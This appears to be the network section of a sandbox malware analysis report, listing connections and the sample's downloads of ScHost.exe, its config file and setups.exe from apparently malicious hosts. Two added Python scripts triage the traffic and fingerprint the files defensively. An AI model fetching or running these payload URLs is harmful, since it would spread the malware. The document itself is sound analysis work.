Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
catser.inappapiurl.com | 138.197.53.157 | |
digitalassets.ams3.digitaloceanspaces.com | 5.101.110.225 | |
greataccesstoserver.com | 159.89.4.33 | |
TCP Requests
- 192.168.56.101:49230 -> 117.18.232.200:80 (no DNS answer for this address is recorded in the table above)
- 192.168.56.101:49215 -> 138.197.53.157:443 (catser.inappapiurl.com)
- 192.168.56.101:49216 -> 138.197.53.157:443 (catser.inappapiurl.com)
- 192.168.56.101:49217 -> 138.197.53.157:443 (catser.inappapiurl.com)
- 192.168.56.101:49218 -> 138.197.53.157:443 (catser.inappapiurl.com)
- 192.168.56.101:49219 -> 138.197.53.157:443 (catser.inappapiurl.com)
- 192.168.56.101:49201 -> 159.89.4.33:80 (greataccesstoserver.com)
- 192.168.56.101:49204 -> 5.101.110.225:443 (digitalassets.ams3.digitaloceanspaces.com)
UDP Requests
- 192.168.56.101:54056 -> 164.124.101.2:53 (DNS)
- 192.168.56.101:55450 -> 164.124.101.2:53 (DNS)
- 192.168.56.101:59369 -> 164.124.101.2:53 (DNS)
- 192.168.56.101:61479 -> 164.124.101.2:53 (DNS)
- 192.168.56.101:62324 -> 164.124.101.2:53 (DNS)
- 192.168.56.101:137 -> 192.168.56.255:137 (NetBIOS name service, subnet broadcast)
- 192.168.56.101:138 -> 192.168.56.255:138 (NetBIOS datagram service, subnet broadcast)
- 192.168.56.101:49152 -> 239.255.255.250:3702 (WS-Discovery multicast)
- 192.168.56.101:62325 -> 239.255.255.250:3702 (WS-Discovery multicast)
- 192.168.56.101:62445 -> 239.255.255.250:1900 (SSDP multicast)
- 192.168.56.101:62447 -> 239.255.255.250:3702 (WS-Discovery multicast)
- 52.231.114.183:123 -> 192.168.56.101:123 (NTP; listed with the remote host as the source)
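Most of the connection lists above are sandbox background noise: resolver queries, NetBIOS broadcasts, SSDP and WS-Discovery multicast, and an NTP exchange. What matters for triage is the handful of external TCP destinations and whether the name the sandbox attached to each one agrees with the DNS answers it recorded. The following Python script is an added example, not part of the report or of any sandbox tool: it parses the records exactly as they were extracted (with the resolved name glued onto the destination port), labels the noise categories, and groups what remains by destination. The input is the report's own data copied inline; the category names and the DNS_TABLE dictionary are the example's own construction.

```python
import ipaddress
import re

# Constructed input: the DNS table and connection lists from the report above,
# copied as "src dst" records. The raw report glues the resolved name onto the
# destination port ("...:443catser.inappapiurl.com"); the parser splits it off.
DNS_TABLE = {
    "catser.inappapiurl.com": "138.197.53.157",
    "digitalassets.ams3.digitaloceanspaces.com": "5.101.110.225",
    "greataccesstoserver.com": "159.89.4.33",
}

TCP_RAW = """\
192.168.56.101:49230 117.18.232.200:80
192.168.56.101:49215 138.197.53.157:443catser.inappapiurl.com
192.168.56.101:49216 138.197.53.157:443catser.inappapiurl.com
192.168.56.101:49217 138.197.53.157:443catser.inappapiurl.com
192.168.56.101:49218 138.197.53.157:443catser.inappapiurl.com
192.168.56.101:49219 138.197.53.157:443catser.inappapiurl.com
192.168.56.101:49201 159.89.4.33:80greataccesstoserver.com
192.168.56.101:49204 5.101.110.225:443digitalassets.ams3.digitaloceanspaces.com
"""

UDP_RAW = """\
192.168.56.101:54056 164.124.101.2:53
192.168.56.101:137 192.168.56.255:137
192.168.56.101:138 192.168.56.255:138
192.168.56.101:49152 239.255.255.250:3702
192.168.56.101:62445 239.255.255.250:1900
52.231.114.183:123 192.168.56.101:123
"""

# ip:port followed by whatever name the sandbox appended (names here all start
# with a letter, so the greedy port group cannot eat into them).
ENDPOINT = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})(\S*)$")


def parse_endpoint(token):
    """Split 'ip:port[name]' into (ip, port, name-or-None)."""
    m = ENDPOINT.match(token)
    if not m:
        raise ValueError(f"unparseable endpoint: {token!r}")
    return m.group(1), int(m.group(2)), m.group(3) or None


def parse_connections(raw, proto):
    conns = []
    for line in raw.splitlines():
        if not line.strip():
            continue
        src, dst = line.split()
        sip, sport, _ = parse_endpoint(src)
        dip, dport, name = parse_endpoint(dst)
        conns.append({"proto": proto, "src": (sip, sport), "dst": (dip, dport), "name": name})
    return conns


def classify(conn):
    """Label sandbox background noise so only real egress is left to look at."""
    sip, sport = conn["src"]
    dip, dport = conn["dst"]
    ip = ipaddress.ip_address(dip)
    if conn["proto"] == "udp" and dport == 53:
        return "dns"
    if conn["proto"] == "udp" and 123 in (sport, dport):
        return "ntp"
    if ip.is_multicast:
        return {1900: "ssdp", 3702: "ws-discovery"}.get(dport, "multicast")
    if ip.is_private and dport in (137, 138):
        return "netbios-broadcast"
    if not ip.is_global:
        return "local"
    return "external"


def external_destinations(conns, dns_table):
    """Group external connections by (ip, port) and cross-check the name the
    sandbox attached against the DNS answers it recorded."""
    by_ip = {ip: name for name, ip in dns_table.items()}
    out = {}
    for c in conns:
        if classify(c) != "external":
            continue
        entry = out.setdefault(c["dst"], {"count": 0, "names": set(), "dns_name": by_ip.get(c["dst"][0])})
        entry["count"] += 1
        if c["name"]:
            entry["names"].add(c["name"])
    return out


if __name__ == "__main__":
    conns = parse_connections(TCP_RAW, "tcp") + parse_connections(UDP_RAW, "udp")
    for dst, info in sorted(external_destinations(conns, DNS_TABLE).items()):
        tag = info["dns_name"] or "no DNS answer recorded"
        print(f"{dst[0]}:{dst[1]}  x{info['count']}  {tag}")
```

Run as-is it leaves four external destinations, five of the eight TCP connections going to 138.197.53.157:443, and flags 117.18.232.200:80 as the one destination with no DNS answer in the report, which is the first thing to chase when the table and the connection list disagree.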
GET https://digitalassets.ams3.digitaloceanspaces.com/cstadmo/setups.exe -> 200
Request:
GET /cstadmo/setups.exe HTTP/1.1
Host: digitalassets.ams3.digitaloceanspaces.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
content-length: 2110791
accept-ranges: bytes
last-modified: Wed, 07 Apr 2021 12:24:13 GMT
x-rgw-object-type: Normal
etag: "44ecbc585f2689d58b5ae9f04fe01b3e"
x-amz-request-id: tx0000000000000f7d54050-00606fbd7d-90880e1-ams3b
content-type: application/octet-stream
date: Fri, 09 Apr 2021 02:35:41 GMT
strict-transport-security: max-age=15552000; includeSubDomains; preload
vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method
GET http://greataccesstoserver.com/files/ScHost.exe -> 200
Request:
GET /files/ScHost.exe HTTP/1.1
Host: greataccesstoserver.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Fri, 09 Apr 2021 02:35:15 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Thu, 08 Apr 2021 11:36:36 GMT
ETag: "56000-5bf7475c04268"
Accept-Ranges: bytes
Content-Length: 352256
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET http://greataccesstoserver.com/files/ScHost.exe.config -> 200
Request:
GET /files/ScHost.exe.config HTTP/1.1
Host: greataccesstoserver.com
Response:
HTTP/1.1 200 OK
Date: Fri, 09 Apr 2021 02:35:16 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 31 Mar 2021 11:46:34 GMT
ETag: "744-5bed3aaaa7a6a"
Accept-Ranges: bytes
Content-Length: 1860
Content-Type: application/x-msdos-program
GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml -> 200
Request:
GET /IE9CompatViewList.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: ie9cvlist.ie.microsoft.com
If-Modified-Since: Thu, 21 Nov 2019 19:37:08 GMT
If-None-Match: 0x8D76EBA32AF0BC3
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Encoding: gzip
Age: 15615
Cache-Control: max-age=21600
Content-MD5: wjbjFuG5rGDOFdrHvLiy3g==
Content-Type: text/xml
Date: Fri, 09 Apr 2021 02:36:48 GMT
Etag: 0x8D871FC7BDF491D
Last-Modified: Fri, 16 Oct 2020 17:54:09 GMT
Server: ECAcc (tka/897A)
Vary: Accept-Encoding
X-Cache: HIT
x-ms-blob-type: BlockBlob
x-ms-lease-status: unlocked
x-ms-request-id: 146bd7a5-e01e-0064-7bc4-2c5da2000000
x-ms-version: 2009-09-19
Content-Length: 13718
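The three downloads above carry more in their headers than a URL and a size. The DigitalOcean Spaces response is S3-compatible storage: a single-part object's ETag is the MD5 of the body (a multipart upload would have a "-<parts>" suffix instead), and the 32-hex ETag here has no such suffix, so setups.exe can be matched against a later pull of the same URL, or against a sample already on disk, without trusting the download path. The two Apache responses use Apache's default FileETag, "<size>-<mtime>" in hex with the mtime in microseconds; decoding it and comparing with Content-Length and Last-Modified is a cheap consistency check, and the microsecond mtime is a finer fingerprint of the server-side file than Last-Modified. Finally, ScHost.exe.config is served as application/x-msdos-program, which fits the .exe in the name rather than the .config on the end, so the content type should not be trusted when deciding what the file is. The script below is an added example, not part of the report or of any sandbox; it embeds the response headers from the report as a constructed transcript (bodies are not in the report), and TLS_HOSTS, the finding labels and the parsing conventions are its own assumptions.

```python
import hashlib
import re
from email.utils import parsedate_to_datetime

# Constructed input: the request/response header pairs from the report above,
# pasted as one transcript (request block, blank line, response block, ...).
# The report shows no bodies, so only headers are parsed.
TRANSCRIPT = """\
GET /cstadmo/setups.exe HTTP/1.1
Host: digitalassets.ams3.digitaloceanspaces.com

HTTP/1.1 200 OK
content-length: 2110791
last-modified: Wed, 07 Apr 2021 12:24:13 GMT
x-rgw-object-type: Normal
etag: "44ecbc585f2689d58b5ae9f04fe01b3e"
content-type: application/octet-stream

GET /files/ScHost.exe HTTP/1.1
Host: greataccesstoserver.com

HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Thu, 08 Apr 2021 11:36:36 GMT
ETag: "56000-5bf7475c04268"
Content-Length: 352256
Content-Type: application/x-msdos-program

GET /files/ScHost.exe.config HTTP/1.1
Host: greataccesstoserver.com

HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 31 Mar 2021 11:46:34 GMT
ETag: "744-5bed3aaaa7a6a"
Content-Length: 1860
Content-Type: application/x-msdos-program
"""

# Assumption taken from the TCP list above: only this host was reached on 443.
TLS_HOSTS = {"digitalassets.ams3.digitaloceanspaces.com"}

APACHE_ETAG = re.compile(r'^"?([0-9a-f]+)-([0-9a-f]+)"?$')
MD5_ETAG = re.compile(r'^"?([0-9a-f]{32})"?$')


def parse_block(block):
    """Return (start line, {lower-cased header: value}) for one header block."""
    lines = block.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_transcript(text):
    """Pair request/response header blocks into download records."""
    blocks = [b for b in re.split(r"\n[ \t]*\n", text.strip()) if b.strip()]
    if len(blocks) % 2:
        raise ValueError("unpaired request/response block")
    records = []
    for req, resp in zip(blocks[::2], blocks[1::2]):
        req_line, req_h = parse_block(req)
        resp_line, resp_h = parse_block(resp)
        method, path, _ = req_line.split()
        host = req_h.get("host", "")
        scheme = "https" if host in TLS_HOSTS else "http"
        records.append({"method": method, "url": f"{scheme}://{host}{path}",
                        "status": int(resp_line.split()[1]), "headers": resp_h})
    return records


def decode_apache_etag(etag):
    """Apache's default FileETag is "<size>-<mtime>", both hex, mtime in
    microseconds. Returns (size_bytes, mtime_epoch_seconds) or None."""
    m = APACHE_ETAG.match(etag)
    if not m:
        return None
    return int(m.group(1), 16), int(m.group(2), 16) // 1_000_000


def s3_content_md5(headers):
    """A single-part object's ETag on S3-compatible storage is the body MD5;
    a multipart ETag has a "-<parts>" suffix and is not a digest."""
    m = MD5_ETAG.match(headers.get("etag", ""))
    return m.group(1) if m else None


def matches_expected_md5(data, expected_md5):
    return hashlib.md5(data).hexdigest() == expected_md5.lower()


def triage(records):
    """Checks derived from headers alone: an MD5 to verify the Spaces object
    against, size/mtime consistency of the Apache ETags, and a content type
    that does not fit the path."""
    findings = []
    for r in records:
        h, url = r["headers"], r["url"]
        if "apache" in h.get("server", "").lower() and "last-modified" in h:
            size, etag_mtime = decode_apache_etag(h.get("etag", "")) or (None, None)
            last_modified = int(parsedate_to_datetime(h["last-modified"]).timestamp())
            ok = size == int(h.get("content-length", -1)) and etag_mtime == last_modified
            findings.append((url, "apache-etag-consistent", ok))
        md5 = s3_content_md5(h)
        if md5:
            findings.append((url, "expected-md5", md5))
        if url.endswith(".config") and h.get("content-type", "").startswith("application/x-msdos"):
            findings.append((url, "content-type-mismatch", h["content-type"]))
    return findings


if __name__ == "__main__":
    for finding in triage(parse_transcript(TRANSCRIPT)):
        print(*finding)
```

For the two Apache ETags the decoded size equals Content-Length and the decoded mtime equals Last-Modified to the second, so the server was not rewriting ETags and the files were last touched on 8 April and 31 March 2021 respectively. Feed a downloaded setups.exe to matches_expected_md5 with the Spaces ETag to confirm it is the same object the sandbox fetched.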
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts